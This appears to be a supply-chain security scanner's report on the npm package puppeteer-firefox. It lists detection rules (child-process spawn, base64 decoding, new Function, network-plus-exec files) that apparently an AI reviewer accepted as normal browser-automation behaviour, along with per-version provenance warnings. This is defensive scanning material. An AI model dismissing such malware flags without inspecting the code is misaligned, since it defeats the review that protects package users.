puppeteer-firefox
Puppeteer API for Firefox
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:lib/JSHandle.js | AI (source-diff): JSHandle.js is core browser automation code for puppeteer-firefox. Network calls and dynamic code execution are expected in a browser automation library communicating with Firefox via DevTools Protocol. | ai | |
| source-diff | large-new-source-files | AI (source-diff): puppeteer-firefox is an actively developed experimental package; adding many source files across versions is expected as the library grows to match Puppeteer's API surface. | ai | |
| semgrep | semgrep:child-process-spawn | AI (semgrep): Spawning Firefox is the primary purpose of this browser automation library; child_process.spawn is expected and necessary. | ai | |
| semgrep | semgrep:child-process-import | AI (semgrep): child_process import is required to launch Firefox — core functionality of a browser launcher package. | ai | |
| install-scripts | install-script:install | AI (install-scripts): puppeteer-firefox's install script downloads a pinned Firefox binary — this is the documented, expected install flow identical to puppeteer's own pattern. | ai | |
| semgrep | semgrep:base64-decode | AI (semgrep): Base64 decoding in NetworkManager.js handles browser protocol response bodies — standard CDP/RDP network interception. | ai | |
| semgrep | semgrep:api-obfuscation-reflect | AI (semgrep): Reflect.get() in helper.js is used for async stack hook installation — legitimate introspection, not obfuscation. | ai | |
| semgrep | semgrep:new-function-constructor | AI (semgrep): new Function() in DOMWorld.js is used for page predicate evaluation — standard Puppeteer internals for waitFor* APIs. | ai | |
| semgrep | semgrep:http-module-request | AI (semgrep): HTTP requests in BrowserFetcher.js are used to download the Firefox binary during install — core functionality, not exfiltration. | ai |
v0.5.1
4 findingsScript: node install.js
This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: mathias.
This version was published by a different npm account than previous versions on 2020-01-09. This could indicate a legitimate maintainer transition or an account compromise.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.5.0
3 findingsThis version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: aslushnikov.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.1
2 findingsThis version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: aslushnikov.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.